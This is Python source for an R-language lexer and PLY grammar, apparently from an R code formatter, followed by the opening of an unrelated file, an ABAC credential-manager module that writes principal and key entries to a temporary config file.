raise RuntimeError('Either a file or a string should be provided')
if isinstance(stream_input, file):
self.stream = stream_input
else:
self.stream = StringIO.StringIO(stream_input)
self.line = 1
self.col = 0
self.last_col = 0
self.last_getc = None
def GetChar(self):
"""Read the next character, updating the current line and column."""
c = self.stream.read(1) or 'R_EOF'
if c != 'R_EOF':
if c == '\n':
self.line += 1
self.last_col, self.col = self.col, 0
else:
self.col += 1
self.last_getc = c # Record for use in UnGetChar below.
return c
def UnGetChar(self):
"""Push the last fetched character back onto the input stream."""
# Currently, no provision is made for calling UnGetChar twice, with no
# intervening GetChar.
if self.last_getc is None:
raise AssertionError('Too many UnGetChar\'s')
# Don't back up if we're past the end of the file, but do back up if we just
# arrived there.
if self.last_getc != 'R_EOF':
self.stream.seek(-1, os.SEEK_CUR)
if self.last_getc == '\n':
self.col, self.last_col = self.last_col, 0
self.line -= 1
self.last_getc = None
else:
self.col -= 1
def IsNextChar(self, c):
"""Fetch a character from the input only if it has the value specified."""
if self.GetChar() == c:
return True
else:
self.UnGetChar()
return False
def Peek(self):
"""Return the value of the next input character, but do not fetch it."""
c = self.GetChar()
self.UnGetChar()
return c
def Checkpoint(self):
"""Record state including the current position of the input stream."""
self.checkpoint = (self.stream.tell(),
(self.line, self.col, self.last_col, self.last_getc))
def Reset(self):
"""Return to the state at the last checkpoint."""
self.stream.seek(self.checkpoint[0], os.SEEK_SET)
self.line, self.col, self.last_col, self.last_getc = self.checkpoint[1]
def Close(self):
self.stream.close()
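# An illustrative sketch of the checkpoint protocol (not part of the original
# module): Checkpoint() records the stream position together with the
# line/column state, and Reset() rewinds to it after a failed probe.
#
#     s = _RStream('x <- 1\n')
#     s.Checkpoint()
#     s.GetChar(); s.GetChar()  # consume 'x' and ' '
#     s.Reset()                 # rewind to the checkpoint
#     assert s.Peek() == 'x'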
class _RComments(object):
"""An object representing comments in R source code (abstract class).
"""
def __init__(self):
self.lines = []
def __str__(self):
return '#' + str(self.lines)
def __nonzero__(self):
"""If this object contains at least one line of text."""
return bool(self.lines)
def AppendLine(self, line):
"""Append a line of text to the comment."""
self.lines.append(line)
def Trim(self):
self.lines = [ln.lstrip('\n') for ln in self.lines]
class _RLineComments(_RComments):
"""A class representing in-line comments.
"""
def __str__(self):
return 'L' + super(_RLineComments, self).__str__()
class _RBlockComments(_RComments):
"""A comment that occupies entire lines and may include blank lines.
"""
def __str__(self):
return 'B' + super(_RBlockComments, self).__str__()
class RToken(object):
"""An analog of the PLY token, with positional information and comments."""
def __init__(self, token_type, value, line, col):
self.line = line
self.col = col
self.type = token_type
self.value = value
self.pre_comments = None
self.post_comments = None
def __str__(self):
return '(%s, %s, %s, %s)@(%d,%d)' % (self.type, self.value,
str(self.pre_comments),
str(self.post_comments),
self.line, self.col)
class _RTokenizer(object):
"""The substrate of the R lexer, responsible for basic tokenization."""
def __init__(self, stream_input):
self.stream = _RStream(stream_input)
def Token(self, token_type, value=None):
"""Construct and return a new RToken.
Args:
      token_type: a string specifying the token's terminal "type", as used
        in PLY's grammar productions.
      value: a string giving the actual text associated with the token. If
        the value supplied is "None", the token's type is its value, too.
Returns:
An RToken with the type and value supplied, and positional information
taken from the input stream.
"""
return RToken(token_type, value or token_type, self.stream.line,
self.stream.col)
def SkipSpace(self):
"""Skip whitespace in the input."""
while True:
c = self.stream.GetChar()
if not (c == ' ' or c == '\t' or c == '\f'):
return c
def ProbeForCommentLine(self, break_on_blank_line=False):
"""Look for a line comprising comments.
Args:
break_on_blank_line: whether to cease the search after a blank line
Returns:
      A string comprising the line, or None if no such line is found.
"""
ws_chars = (' ', '\t', '\f')
le_chars = ('\n', 'R_EOF')
s = []
def NextChar(c):
if c:
s.append(c)
return self.stream.GetChar()
def Line():
return ''.join(s).lstrip('\n')
state = 1
c = ''
while True:
c = NextChar(c)
if state == 1:
if c == '\n' or c in ws_chars:
if break_on_blank_line and c == '\n':
break
if self.stream.Peek() == 'R_EOF': break
state = 2
continue
elif c == '#':
state = 3
continue
else:
break
if state == 2:
if c in ws_chars:
continue
elif c in le_chars:
return Line()
elif c == '#':
state = 3
continue
else:
break
if state == 3:
if c in le_chars:
return Line()
else:
continue
return None
def ProbeForComments(self, post):
"""Look for comments before or after a token.
Args:
post: whether the comments occur after a token.
Returns:
An RLineComments (post = True) or RBlockComments (post = False)
containing the comments, or None if none are found.
"""
comments = (_RLineComments if post else _RBlockComments)()
start_col = self.stream.col
hash_col = 0
do_reset = True
while True:
self.stream.Checkpoint()
line = self.ProbeForCommentLine(
break_on_blank_line=post and not hash_col)
if line is None:
break
if post:
ls_line = line.lstrip()
if not ls_line:
# Absorb trailing spaces, but don't make up a line comment
do_reset = hash_col > 0
self.stream.UnGetChar() # Leave last CR in the stream
break
if not hash_col:
hash_col = start_col + len(line) - len(ls_line) + 1
elif len(line) - len(ls_line) + 1 < hash_col:
break
self.stream.UnGetChar()
comments.AppendLine(line)
if do_reset:
self.stream.Reset()
if comments:
return comments
else:
return None
def NumericValue(self, c):
"""Read a NextToken comprising a numeric value.
Args:
c: the first character of the numeric value.
Returns:
An RToken of type 'NUM_CONST' containing the numeric value as a string.
"""
seen_dot = c == '.'
seen_exp = False
s = [c]
while True:
c = self.stream.GetChar()
if not (c.isdigit() or c == '.' or c == 'e' or c == 'E'):
break
if c == 'e' or c == 'E':
if seen_exp: break
seen_exp = True
seen_dot = True
s.append(c)
c = self.stream.GetChar()
if not (c.isdigit() or c == '+' or c == '-'): break
if c == '.':
if seen_dot: break
seen_dot = True
s.append(c)
if c in ('i', 'L'):
s.append(c)
else:
self.stream.UnGetChar()
return self.Token('NUM_CONST', ''.join(s))
def StringValue(self, quote):
"""Read a NextToken comprising a literal string value.
Args:
quote: the quote character signifying the beginning of the string.
Returns:
An RToken of type 'STR_CONST' containing the string.
"""
s = [quote]
while True:
c = self.stream.GetChar()
if c == 'R_EOF':
c = quote
s.append(c)
if c == quote:
return self.Token('STR_CONST', ''.join(s))
if c == '\\':
s.append(self.stream.GetChar())
def QuotedSymbolValue(self, c):
"""Read a NextToken comprising a back-quoted symbol.
Args:
c: the back quote character signifying the beginning of the string.
Returns:
An RToken of type 'SYMBOL' containing the symbol.
"""
val = self.StringValue(c)
val.type = 'SYMBOL'
return val
def SpecialValue(self, c):
"""Read a NextToken comprising a special operator, delimited by '%'.
Args:
c: the '%' character signifying the beginning of the string.
Returns:
An RToken of type 'SPECIAL' containing the operator.
"""
s = [c]
while True:
c = self.stream.GetChar()
if c == 'R_EOF': c = '%'
if c == '\n':
_RaiseRSyntaxError('Syntax error:\n End of line in special',
(self.stream.line, self.stream.col))
s.append(c)
if c == '%': return self.Token('SPECIAL', ''.join(s))
# Certain symbols are recognized as keywords if they're in the following
# dict.
keywords = {'function': 'FUNCTION',
'while': 'WHILE',
'repeat': 'REPEAT',
'for': 'FOR',
'if': 'IF',
'in': 'IN',
'else': 'ELSE',
'next': 'NEXT',
'break': 'BREAK'}
def SymbolValue(self, c):
"""Read a non-quoted symbol (usually an identifier) or keyword.
Args:
c: the character beginning the symbol.
Returns:
An RToken containing the symbol, with a particular keyword type if the
symbol is one of R's reserved keywords, or of type 'SYMBOL' otherwise.
"""
s = [c]
while True:
c = self.stream.GetChar()
# Special case simple package qualifications "pkg::var" and "pkg:::var";
# rendering these as a single token, rather than a binary expression
# avoids considerable unpleasantness in formatting.
if c == ':':
self.stream.Checkpoint()
if self.stream.GetChar() == ':': # Got '::'
s += [':'] * 2
c = self.stream.GetChar()
if c == ':': # Got ':::'
s += [':']
c = self.stream.GetChar()
else:
self.stream.Reset()
if c == 'R_EOF' or not (c.isalnum() or c == '.' or c == '_'):
self.stream.UnGetChar()
txt = ''.join(s)
return self.Token(_RTokenizer.keywords.get(txt, 'SYMBOL'), txt)
s.append(c)
def NextToken(self):
"""Read the next token from the input stream."""
c = self.SkipSpace()
# The structure of this method follows that of the C code fairly closely;
# doubtless it could be factored more elegantly.
if c == 'R_EOF':
return self.Token('END_OF_INPUT')
if c.isdigit() or (c == '.' and self.stream.Peek().isdigit()):
return self.NumericValue(c)
if c == '"' or c == "'":
return self.StringValue(c)
if c == '%':
return self.SpecialValue(c)
if c == '`':
return self.QuotedSymbolValue(c)
if c.isalpha() or c == '.':
return self.SymbolValue(c)
if c == '{':
return self.Token('LBRACE', '{')
if c == '}':
return self.Token('RBRACE', '}')
if c == '<':
if self.stream.IsNextChar('='):
return self.Token('LE', '<=')
if self.stream.IsNextChar('-'):
return self.Token('LEFT_ASSIGN', '<-')
if self.stream.IsNextChar('<'):
if self.stream.IsNextChar('-'):
return self.Token('LEFT_ASSIGN', '<<-')
else:
return None
return self.Token('<')
if c == '-':
if self.stream.IsNextChar('>'):
if self.stream.IsNextChar('>'):
return self.Token('RIGHT_ASSIGN', '->>')
else:
return self.Token('RIGHT_ASSIGN', '->')
return self.Token('-')
if c == '>':
if self.stream.IsNextChar('='):
return self.Token('GE', '>=')
else:
return self.Token('>')
if c == '!':
if self.stream.IsNextChar('='):
return self.Token('NE', '!=')
else:
        return self.Token('!')
if c == '=':
if self.stream.IsNextChar('='):
return self.Token('EQ', '==')
else:
return self.Token('EQ_ASSIGN', '=')
if c == ':':
if self.stream.IsNextChar(':'):
if self.stream.IsNextChar(':'):
return self.Token('NS_GET_INT', ':::')
else:
return self.Token('NS_GET', '::')
if self.stream.IsNextChar('='):
return self.Token('LEFT_ASSIGN', ':=')
return self.Token(':')
if c == '&':
if self.stream.IsNextChar('&'):
return self.Token('AND2', '&&')
else:
return self.Token('AND', '&')
if c == '|':
if self.stream.IsNextChar('|'):
return self.Token('OR2', '||')
else:
return self.Token('OR', '|')
if c == '[':
if self.stream.IsNextChar('['):
return self.Token('LBB', '[[')
else:
return self.Token('[')
if c == '*':
if self.stream.IsNextChar('*'):
return self.Token('^')
else:
return self.Token(c)
# Default
return self.Token(c)
class _RLexer(object):
"""An object that carries out context-sensitive lexing of the R language.
For explanation of the grisly details, see:
https://github.com/wch/r-source/blob/trunk/src/main/gram.y#L2975
"""
def __init__(self):
# Vacuous; the design of PLY makes it expedient to relegate the setup to
# the input method below.
pass
# Non-Google standard naming is mandated by PLY.
# pylint: disable=invalid-name
def input(self, stream_input):
"""Initialize the lexer from a string or a stream."""
self.tokenizer = _RTokenizer(stream_input)
self.context = ['LBRACE']
self.__IgnoreNewLines = False
self.SavedToken = None
self.begin_token = self.tokenizer.Token('BEGIN')
self.saved_pre_comments = None
@property
def IgnoreNewLines(self):
# Strictly speaking, this method and its partner could be easily abolished
# in favor of direct field access. However, so tortuous is R's lexing
# process that it's very useful, at least pro tem, to have methods in this
# connection for (temporary) journaling and debugging purposes.
return self.__IgnoreNewLines
@IgnoreNewLines.setter
def IgnoreNewLines(self, value):
self.__IgnoreNewLines = value
def IgnoreNewLinesFromParser(self, value):
"""Switch the behavior of the lexer from the parser."""
self.IgnoreNewLines = value
def CurContext(self):
"""A character signifying the construct in which lexing is taking place."""
return self.context[-1]
def IfPush(self):
"""Record entry of the lexer into a conditional construct."""
if self.CurContext() in ('LBRACE', '[', '(', 'i'):
self.context.append('i')
self.saved_new_lines = 0
def IfPop(self):
"""Record exit from a conditional construct."""
if self.CurContext() == 'i':
self.context.pop()
# Non-Google standard naming is mandated by PLY.
# pylint: disable=invalid-name
def token(self):
tok = self.__token()
return tok
def __token(self):
"""Return the next token retrieved by the lexer."""
# Deals with saved state from earlier scans---actual scanning is delegated
# to ScanForToken().
if self.begin_token:
token, self.begin_token = self.begin_token, None
else:
token = self.ScanForToken()
if token.type == 'END_OF_INPUT':
if token.pre_comments:
anchor = self.tokenizer.Token('SYMBOL', '__END_COMMENT_ANCHOR__')
anchor.pre_comments = token.pre_comments
return anchor
return None
token.post_comments = self.tokenizer.ProbeForComments(post=True)
return token
def ScanForToken(self):
"""Actually scan for the next token in the input stream."""
while True:
if self.SavedToken:
tok, self.SavedToken = self.SavedToken, None
else:
if self.saved_pre_comments is not None:
pre_comments = self.saved_pre_comments
self.saved_pre_comments = None
else:
pre_comments = self.tokenizer.ProbeForComments(post=False)
tok = self.tokenizer.NextToken()
tok.pre_comments = pre_comments
      if not (tok.value == '\n' and
(self.IgnoreNewLines or self.CurContext() in ('[', '('))):
break
    if tok.value == '\n':
      self.saved_pre_comments = tok.pre_comments
if self.CurContext() == 'i': # In 'if' context
while tok.value == '\n':
tok = self.tokenizer.NextToken()
tok.pre_comments = self.saved_pre_comments
self.saved_pre_comments = None
if tok.type == 'RBRACE' or tok.type == ')' or tok.type == ']':
while self.CurContext() == 'i':
self.IfPop()
self.context.pop()
return tok
if tok.value == ',':
self.IfPop()
return tok
if tok.type == 'ELSE':
self.IgnoreNewLines = True
self.IfPop()
return tok
else:
self.IfPop()
self.SavedToken = tok
return self.tokenizer.Token('CR')
return self.tokenizer.Token('CR')
if tok.type in ('+', '-', '*', '/', '^', 'LT', 'LE', 'GE', 'GT', 'EQ',
'NE', 'OR', 'AND', 'OR2', 'AND2', 'SPECIAL', 'FUNCTION',
'WHILE', 'REPEAT', 'FOR', 'IN', '?', '!', '-', ':',
'$', '@', 'LEFT_ASSIGN', 'RIGHT_ASSIGN', 'EQ_ASSIGN'):
self.IgnoreNewLines = True
elif tok.type == 'IF':
self.IfPush()
self.IgnoreNewLines = True
elif tok.type == 'ELSE':
self.IfPop()
self.IgnoreNewLines = True
elif tok.type in (';', ','):
self.IfPop()
elif tok.type in ('SYMBOL', 'STR_CONST', 'NUM_CONST', 'NULL_CONST', 'NEXT',
'BREAK'):
self.IgnoreNewLines = False
elif tok.type == 'LBB':
self.context.append('[')
self.context.append('[')
elif tok.type == '[':
self.context.append(tok.type)
elif tok.type == 'LBRACE':
self.context.append(tok.type)
self.IgnoreNewLines = False
elif tok.type == '(':
self.context.append(tok.type)
elif tok.type == ']':
while self.CurContext() == 'i':
self.IfPop()
self.context.pop()
self.IgnoreNewLines = False
elif tok.type == 'RBRACE':
while self.CurContext() == 'i':
self.IfPop()
self.context.pop()
elif tok.type == ')':
while self.CurContext() == 'i':
self.IfPop()
self.context.pop()
self.IgnoreNewLines = False
return tok
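# An illustrative driver for the lexer (not part of the original module):
# PLY calls input() once, then token() repeatedly until it returns None.
# The first token delivered is the synthetic BEGIN token.
#
#     lexer = _RLexer()
#     lexer.input('x <- f(1, 2)\n')
#     tok = lexer.token()
#     while tok is not None:
#         print tok
#         tok = lexer.token()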
class NodeTypeError(base.Error):
"""Signal attempt to check for unknown parse node type."""
_known_parse_node_types = []
def ParseNode(typename, field_names, subnode_indexes=None):
"""Return a constructor for a type of parse tree node.
Args:
typename: a string that names the node type.
field_names: a string consisting of a comma-separated list of fields in the
new node type.
subnode_indexes: a list of integers, specifying those fields of the node
that may themselves contain parse nodes. If this argument is None, or
no actual parameter is provided, it is assumed that all fields are
potential parse nodes.
Returns:
    A function that accepts as arguments values for a new node's fields, and
    which returns a newly-created node of the given type.
"""
# Monkey patched methods to check a node's type.
def _NodeHasType(node, typename):
"""Check that a parse tree node has a given type.
Args:
node: a parse tree node; normally bound, as this function is used as a
method.
typename: a string that names a node type.
Returns:
Whether the type of the node is that given.
Raises:
NodeTypeError: the type name provided was unknown.
"""
if typename not in _known_parse_node_types:
raise NodeTypeError('"%s" is not a known node type' %
typename)
return typename == node.__class__.__name__
def _NodeHasTypeIn(node, typenames):
"""Check that a parse tree node has one of a given sequence of types.
Args:
node: a parse tree node; normally bound, as this function is used as a
method.
typenames: a sequence of strings that name node types.
Returns:
Whether the type of the node is in the given sequence of types.
Raises:
NodeTypeError: one or more of the type names provided was unknown.
"""
unknown_types = set(typenames).difference(_known_parse_node_types)
if unknown_types:
if len(unknown_types) == 1:
raise NodeTypeError('"%s" is not a known node type' %
unknown_types[0])
else:
raise NodeTypeError('%s are not known node types' %
', '.join('"%s"' % t for t in unknown_types))
return node.__class__.__name__ in typenames
_known_parse_node_types.append(typename)
cls = collections.namedtuple(typename, field_names)
if subnode_indexes is None:
# Naughty but necessary
# pylint: disable=protected-access
subnode_indexes = range(len(cls._fields))
cls.subnode_indexes = subnode_indexes
cls.HasType = _NodeHasType
cls.HasTypeIn = _NodeHasTypeIn
return cls
# Parse tree node types used for R.
# The following are really classes, not constants, so we beg dispensation from
# the linter.
# pylint: disable=invalid-name
Prog = ParseNode('Prog', 'begin, exprlist')
ExprOrAssign = ParseNode('ExprOrAssign', 'expr1, eq_assign, expr2')
Comment = ParseNode('Comment', 'comment', [])
FunCall = ParseNode('FunCall', 'expr, lparen, arglist, rparen')
Unary = ParseNode('Unary', 'op, expr')
Binary = ParseNode('Binary', 'lexpr, op, rexpr')
Assign = ParseNode('Assign', 'expr1, assign, expr2')
Paren = ParseNode('Paren', 'lparen, expr_or_assign, rparen')
Brace = ParseNode('Brace', 'lbrace, exprlist, rbrace')
If = ParseNode('If', 'if_, cond, expr_or_assign')
IfElse = ParseNode('IfElse',
'if_, cond, expr_or_assign1, else_, expr_or_assign2')
While = ParseNode('While', 'while_, cond, expr_or_assign')
Repeat = ParseNode('Repeat', 'repeat_, expr_or_assign')
For = ParseNode('For', 'for_, forcond, expr_or_assign')
Defun = ParseNode('Defun',
'function, lparen, formlist, rparen, expr_or_assign')
Subscript1 = ParseNode('Subscript1', 'expr, lbrac, sublist, rbrac')
Subscript2 = ParseNode('Subscript2', 'expr, lbbrac, sublist, rbrac1, rbrac2')
Cond = ParseNode('Cond', 'lparen, expr, rparen')
ForCond = ParseNode('ForCond', 'lparen, symbol, in_, expr, rparen')
ExprList = ParseNode('ExprList', 'elements')
ExprListElt = ParseNode('ExprListElt', 'expr_or_assign, semicolon')
ArgList = ParseNode('ArgList', 'elements')
ArgListElt = ParseNode('ArgListElt', 'arg, comma')
Arg = ParseNode('Arg', 'lhs, eq_assign, rhs')
Atom = ParseNode('Atom', 'type, text, comments', [])
# pylint: enable=invalid-name
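# An illustrative sketch (not part of the original module): the constructors
# above behave like namedtuples, and the monkey-patched HasType/HasTypeIn
# methods validate queried names against _known_parse_node_types.
#
#     node = Binary(Atom('SYMBOL', 'x', (None, None)),
#                   Atom('+', '+', (None, None)),
#                   Atom('NUM_CONST', '1', (None, None)))
#     assert node.HasType('Binary')
#     assert node.HasTypeIn(('Binary', 'Unary'))
#     node.HasType('Nonesuch')  # raises NodeTypeError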
class RSyntaxError(base.Error):
"""Raised when the R formatter encounters an error during parsing."""
def _RaiseRSyntaxError(msg, line_col=None):
if line_col:
msg += ' at line: %d, column: %d' % line_col
raise RSyntaxError(msg)
# PLY grammar for parsing R.
# For an overview of PLY's operation, see:
# http://www.dabeaz.com/ply/ply.html#ply_nn22.
tokens = ('NUM_CONST', 'STR_CONST', 'SYMBOL', 'SPECIAL', 'FUNCTION', 'WHILE',
'REPEAT', 'FOR', 'IF', 'IN', 'ELSE', 'NEXT', 'BREAK', 'LE',
'LEFT_ASSIGN', 'RIGHT_ASSIGN', 'GE', 'NE', 'EQ', 'EQ_ASSIGN',
'NS_GET_INT', 'NS_GET', 'AND2', 'AND', 'OR2', 'OR', 'LBB', 'BEGIN',
'?', 'LOW', '~', 'TILDE', '!', 'UNOT', '>', '<', '+', '-', '*',
'/', ':', 'UMINUS', 'UPLUS', '^', '$', '@', '(', '[', 'CR', 'LBRACE',
'RBRACE', 'COMMENT')
precedence = (('left', '?'),
('left', 'LOW', 'WHILE', 'FOR', 'REPEAT'),
('right', 'IF'),
('left', 'ELSE'),
('right', 'LEFT_ASSIGN'),
('right', 'EQ_ASSIGN'),
('left', 'RIGHT_ASSIGN'),
('left', '~', 'TILDE'),
('left', 'OR'),
('left', 'AND'),
('left', 'UNOT', '!'),
('left', '>', 'GE', '<', 'LE', 'EQ', 'NE'),
('left', '+', '-'),
('left', '*', '/'),
('left', 'SPECIAL'),
('left', ':'),
('left', 'UMINUS', 'UPLUS'),
('right', '^'),
('left', '$', '@'),
('left', 'NS_GET', 'NS_GET_INT'),
('nonassoc', '(', '[', 'LBB'))
def Precedence(op):
"""The numeric precedence of a binary operator."""
# Particularly convenient during layout of binary operators.
return float(sum(i * (op in grp[1:])
for i, grp in enumerate(precedence))) / len(precedence)
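# For example, with the table above this yields strictly increasing values
# for tighter-binding operators:
#
#     Precedence('+') < Precedence('*') < Precedence('^')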
def _MakeAtom(p, i):
"""Make an Atom parse tree node from the PLY parser state.
Args:
p: a YaccProduction containing the state of the PLY parser.
i: the index of a terminal token in the production from which the node is
to be constructed.
Returns:
A parse tree node with the token's type, value and attached comments.
"""
tok = p.slice[i]
return Atom(tok.type, tok.value, (tok.pre_comments, tok.post_comments))
def ParseTreeFor(stream_input, **parse_args):
"""Run the R parser on the stream provided and return a parse tree."""
return _r_parser.parse(input=stream_input, lexer=_RLexer(), **parse_args)
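# An illustrative call (not part of the original module):
#
#     tree = ParseTreeFor('f <- function(x) x + 1\n')
#     # tree is a Prog node whose exprlist wraps an Assign of a SYMBOL
#     # to a Defun node.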
# Begin PLY YACC productions.
# Disable lint checks that are incompatible with PLY's use of docstrings to
# express grammar productions.
# pylint: disable=g-docstring-quotes,g-short-docstring-punctuation
# pylint: disable=g-space-before-docstring-summary
# pylint: disable=g-no-space-after-docstring-summary
# pylint: disable=g-missing-docstring,g-doc-args,g-bad-name,g-doc-exception
def p_prog(p):
"""prog : BEGIN exprlist
"""
p[0] = Prog(_MakeAtom(p, 1), ExprList(p[2]))
def p_expr_or_assign(p):
"""expr_or_assign : expr
| expr EQ_ASSIGN expr_or_assign
"""
if len(p) == 2:
p[0] = ExprOrAssign(None, None, p[1])
else:
p[0] = ExprOrAssign(p[1], _MakeAtom(p, 2), p[3])
def p_exprlist(p):
"""exprlist :
| expr_or_assign
| CR exprlist
| ';' exprlist
| expr_or_assign CR exprlist
| expr_or_assign ';' exprlist
"""
p.lexer.IgnoreNewLinesFromParser(False)
if len(p) == 1:
p[0] = []
elif len(p) == 2:
p[0] = [ExprListElt(p[1], None)]
elif len(p) == 3:
if p[1] == ';':
p[0] = [ExprListElt(None, _MakeAtom(p, 1))] + p[2]
elif p[-1] == 'CR':
# Two consecutive CRs (i.e. an empty statement) result in a blank line
p[0] = [ExprListElt(None, None)] + p[2]
else:
p[0] = p[2]
else:
e1 = ExprListElt(p[1], _MakeAtom(p, 2) if p[2] == ';' else None)
p[0] = [e1] + p[3]
def p_expr_comment(p):
"""expr : COMMENT
"""
p[0] = Comment(p[1])
def p_expr_atom(p):
"""expr : NEXT
| BREAK
| NUM_CONST
| STR_CONST
| SYMBOL
"""
p[0] = _MakeAtom(p, 1)
def p_expr_function_call(p):
"""expr : expr '(' sublist ')'
"""
p[0] = FunCall(p[1], _MakeAtom(p, 2), ArgList(p[3]), _MakeAtom(p, 4))
def p_expr_unop(p):
"""expr : '-' expr %prec UMINUS
| '+' expr %prec UMINUS
| '!' expr %prec UNOT
| '~' expr %prec TILDE
| '?' expr
"""
p[0] = Unary(_MakeAtom(p, 1), p[2])
def p_expr_binop(p):
"""expr : expr ':' expr
| expr NS_GET expr
| expr NS_GET_INT expr
| expr '$' expr
| expr '@' expr
| expr '+' expr
| expr '-' expr
| expr '*' expr
| expr '/' expr
| expr '^' expr
| expr SPECIAL expr
| expr '%' expr
| expr '~' expr
| expr '?' expr
| expr '<' expr
| expr LE expr
| expr EQ expr
| expr NE expr
| expr GE expr
| expr '>' expr
| expr AND expr
| expr OR expr
| expr AND2 expr
| expr OR2 expr
"""
p[0] = Binary(p[1], _MakeAtom(p, 2), p[3])
def p_expr_assign(p):
"""expr : expr LEFT_ASSIGN expr
| expr RIGHT_ASSIGN expr
"""
p[0] = Assign(p[1], _MakeAtom(p, 2), p[3])
def p_expr_paren(p):
"""expr : '(' expr_or_assign ')'
"""
p[0] = Paren(_MakeAtom(p, 1), p[2], _MakeAtom(p, 3))
def p_sublist(p):
"""sublist :
| sub
| ',' sublist
| sub ',' sublist
"""
if len(p) == 1:
p[0] = [ArgListElt(None, None)]
elif len(p) == 2:
p[0] = [ArgListElt(p[1], None)]
elif len(p) == 3:
p[0] = [ArgListElt(None, _MakeAtom(p, 1))] + p[2]
else:
p[0] = [ArgListElt(p[1], _MakeAtom(p, 2))] + p[3]
def p_sub(p):
"""sub : expr
| SYMBOL EQ_ASSIGN
| SYMBOL EQ_ASSIGN expr
| STR_CONST EQ_ASSIGN
| STR_CONST EQ_ASSIGN expr
"""
if len(p) == 2:
p[0] = Arg(None, None, p[1])
return
p[0] = Arg(_MakeAtom(p, 1), _MakeAtom(p, 2), p[3] if len(p) == 4 else None)
def p_expr_braced_block(p):
"""expr : LBRACE exprlist RBRACE
"""
p[0] = Brace(_MakeAtom(p, 1), ExprList(p[2]), _MakeAtom(p, 3))
def p_eatlines(p):
"""eatlines :
"""
p.lexer.IgnoreNewLinesFromParser(True)
def p_expr_if_expr(p):
"""expr : IF '(' expr eatlines ')' expr_or_assign
"""
p[0] = If(_MakeAtom(p, 1), Cond(_MakeAtom(p, 2), p[3], _MakeAtom(p, 5)), p[6])
def p_expr_if_else(p):
"""expr : IF '(' expr eatlines ')' expr_or_assign ELSE expr_or_assign
"""
p[0] = IfElse(_MakeAtom(p, 1), Cond(_MakeAtom(p, 2), p[3], _MakeAtom(p, 5)),
p[6], _MakeAtom(p, 7), p[8])
def p_expr_while(p):
"""expr : WHILE '(' expr eatlines ')' expr_or_assign
"""
p[0] = While(_MakeAtom(p, 1), Cond(_MakeAtom(p, 2), p[3], _MakeAtom(p, 5)),
p[6])
def p_expr_repeat(p):
"""expr : REPEAT expr_or_assign
"""
p[0] = Repeat(_MakeAtom(p, 1), p[2])
def p_expr_for_expr(p):
"""expr : FOR '(' SYMBOL IN expr eatlines ')' expr_or_assign %prec FOR
"""
p[0] = For(_MakeAtom(p, 1), ForCond(_MakeAtom(p, 2), _MakeAtom(p, 3),
_MakeAtom(p, 4), p[5], _MakeAtom(p, 7)),
p[8])
def p_expr_function(p):
"""expr : FUNCTION '(' formlist eatlines ')' expr_or_assign %prec LOW
"""
p[0] = Defun(_MakeAtom(p, 1), _MakeAtom(p, 2), ArgList(p[3]), _MakeAtom(p, 5),
p[6])
def p_formlist(p):
"""formlist :
| form
| form ',' formlist
"""
if len(p) == 1:
p[0] = [ArgListElt(None, None)]
elif len(p) == 2:
p[0] = [ArgListElt(p[1], None)]
else:
p[0] = [ArgListElt(p[1], _MakeAtom(p, 2))] + p[3]
def p_form(p):
"""form : SYMBOL
| SYMBOL EQ_ASSIGN expr
"""
if len(p) == 2:
p[0] = Arg(_MakeAtom(p, 1), None, None)
return
p[0] = Arg(_MakeAtom(p, 1), _MakeAtom(p, 2), p[3])
def p_expr_subscript(p):
"""expr : expr '[' sublist ']'
| expr LBB sublist ']' ']'
"""
if len(p) == 5:
p[0] = Subscript1(p[1], _MakeAtom(p, 2), ArgList(p[3]), _MakeAtom(p, 4))
else:
p[0] = Subscript2(p[1], _MakeAtom(p, 2), ArgList(p[3]), _MakeAtom(p, 4),
_MakeAtom(p, 5))
def p_error(p):
if p is None:
_RaiseRSyntaxError('Unexpected end of file')
else:
_RaiseRSyntaxError('Unexpected "%s"' % p.value, (p.line, p.col))
# End PLY YACC productions.
# Generate an instance of the R parser, generated from the productions above.
# Options keep PLY from generating extraneous output files.
# TODO(pyelland): Consider making the latter command line options.
_r_parser = yacc.yacc(debug=False, optimize=True, tabmodule=rparsetab,
write_tables=False)
|
|
#----------------------------------------------------------------------
# Copyright (c) 2011-2015 Raytheon BBN Technologies
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and/or hardware specification (the "Work") to
# deal in the Work without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Work, and to permit persons to whom the Work
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Work.
#
# THE WORK IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS
# IN THE WORK.
#----------------------------------------------------------------------
# Class to manage a set of ABAC credentials, certificates and prove queries
from ConfigParser import ConfigParser
import optparse
import os
import subprocess
import sys
import tempfile
import ABAC
from chapi_log import *
# Generate an ABACManager config file
# [Principals]
# name=certfile
# ...
# [Keys]
# name=keyfile
#
# Return name of config file and any tempfiles created in this process
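# For illustration, a generated config file might look like this
# (hypothetical principal names and temp file paths):
#
#   [Principals]
#   ME=/path/to/me_cert.pem
#   Alice=/tmp/tmpAbC123
#   [Keys]
#   ME=/path/to/me_key.pem
#   [AssertionFiles]
#   /tmp/tmpDeF456=None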
def create_abac_manager_config_file(id_cert_files, id_certs, id_key_files, \
raw_assertions):
tempfiles = []
# Format
# [Principals]
# The principals ("ME" and any in ID dictionary)
# [Keys]
# The keys ("ME")
# [AssertionFiles]
(fd, config_filename) = tempfile.mkstemp()
tempfiles.append(config_filename)
os.close(fd)
file = open(config_filename, 'w')
file.write('[Principals]\n')
for id_name, id_cert_file in id_cert_files.items():
file.write('%s=%s\n' % (id_name, id_cert_file))
for id_name, id_cert in id_certs.items():
(id_fd, id_filename) = tempfile.mkstemp()
tempfiles.append(id_filename)
os.close(id_fd)
id_file = open(id_filename, 'w')
id_file.write(id_cert)
id_file.close()
file.write('%s=%s\n' % (id_name, id_filename))
file.write('[Keys]\n')
for id_key_name, id_key_file in id_key_files.items():
file.write('%s=%s\n' % (id_key_name, id_key_file))
file.write('[AssertionFiles]\n')
